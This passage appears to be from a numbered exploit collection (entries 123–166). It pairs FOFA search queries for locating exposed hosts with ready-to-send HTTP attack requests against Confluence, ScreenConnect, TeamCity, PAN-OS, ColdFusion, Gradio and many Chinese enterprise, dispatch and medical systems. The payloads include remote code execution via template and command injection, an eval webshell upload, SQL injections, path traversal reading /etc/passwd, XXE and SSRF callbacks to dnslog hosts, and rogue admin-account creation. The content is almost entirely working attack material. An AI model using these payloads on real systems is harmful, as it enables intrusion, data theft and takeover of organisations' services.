Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5云商城 (H5 Cloud Mall) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected versions:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the content of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking toll system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
